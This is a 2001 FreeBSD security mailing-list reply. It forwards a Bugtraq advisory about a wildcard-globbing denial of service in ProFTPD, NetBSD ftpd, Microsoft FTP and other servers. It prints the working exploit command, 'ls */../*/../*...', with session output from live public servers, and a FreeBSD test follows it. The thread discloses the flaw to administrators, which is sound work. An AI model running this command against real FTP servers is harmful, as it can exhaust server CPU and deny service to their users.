From owner-freebsd-security Fri Mar 16 5:52:42 2001 Delivered-To: freebsd-security@freebsd.org Received: from mailgate.kechara.net (mailgate.kechara.net [62.49.139.2]) by hub.freebsd.org (Postfix) with ESMTP id 8A08037B718 for ; Fri, 16 Mar 2001 05:52:37 -0800 (PST) (envelope-from lee@kechara.net) Received: from area57 (lan-fw.kechara.net [62.49.139.3]) by mailgate.kechara.net (8.9.3/8.9.3) with SMTP id PAA16561 for ; Fri, 16 Mar 2001 15:02:57 GMT Message-Id: <200103161502.PAA16561@mailgate.kechara.net> Date: Fri, 16 Mar 2001 13:56:08 -0000 To: freebsd-security@freebsd.org From: Lee Smallbone Subject: Re: Multiple vendors FTP denial of service (fwd) Reply-To: lee@kechara.net Organization: Kechara Internet X-Mailer: Opera 5.02 build 856a X-Priority: 3 (Normal) Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org 4.2-RELEASE, regular user, regular home directory (snipped) /../www/62.49.139.3_3-year.png www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www /../www/62.49.139.3_3.html www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www /../www/btareshit.png www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www /../www/62.49.139.3_3.old 226 Transfer complete. ftp: 5740 bytes received in 0.11Seconds 52.66Kbytes/sec. ftp> 15/03/2001 22:21:16, Attila Nagy wrote: >FreeBSD isn't listed, but also vulnerable, at least with the FTPd in >-STABLE. > >---------- Forwarded message ---------- >Date: Thu, 15 Mar 2001 09:34:09 +0100 >From: "Frank DENIS (Jedi/Sector One)" >To: BUGTRAQ@SECURITYFOCUS.COM >Subject: Multiple vendors FTP denial of service > >- Proftpd built-in 'ls' command has a globbing bug that allows remote >denial-of-service. > > Here's a simple exploit, tested on the Proftpd site : > >$ ftp ftp.proftpd.org >... >Name (ftp.proftpd.org:j): ftp >... >230 Anonymous access granted, restrictions apply. >Remote system type is UNIX. >Using binary mode to transfer files. >ftp> ls */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../* >227 Entering Passive Mode (216,10,40,219,4,111). >421 Service not available, remote server timed out. Connection closed > > That command takes 100% CPU time on the server. It can lead into an easy >DOS even if few remote simultanous connections are allowed. > > Other FTP servers may be concerned as well. Here are various tries : > >- NetBSD FTP showed the same behavior than Proftpd : > >ftp> ls */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../* >200 EPRT command successful. >(long delay) >421 Service not available, remote server timed out. Connection closed > >So NetBSD-ftpd 20000723a may also consume 100% cpu time, resulting in a >possible DOS. Other BSD FTP may be affected as well. > >- Microsoft FTP Service (Version 5.0) seems also confused by the command : >ftp> ls */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../* >500 'EPSV': command not understood >227 Entering Passive Mode (207,46,133,140,4,223). >200 PORT command successful. >150 Opening ASCII mode data connection for file list. >(very long delay... nothing happens...) > >- Publicfile refuses the command : > >ftp> ls */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../* >227 =131,193,178,181,97,222 >550 Sorry, I can't open that file: file does not exist. > >- Wu-FTPd 2.6.1 is not vulnerable. Only the result of 'ls *' is computed and >displayed. > >- PureFTPd (any version) is not vulnerable. Result is "Simplified wildcard >expression to *" and the 'ls *' output. > > > Maintainers of vulnerable servers have been warned of this bug. > >-- > -=- Frank DENIS aka Jedi/Sector One < spam@jedi.claranet.fr > -=- > LINAGORA SA (Paris, France) : http://www.linagora.com > > > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security" in the body of the message > -- Lee Smallbone Kechara Internet lee@kechara.net www.kechara.net Tel: (01243) 869 969 Fax: (01243) 866 685 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message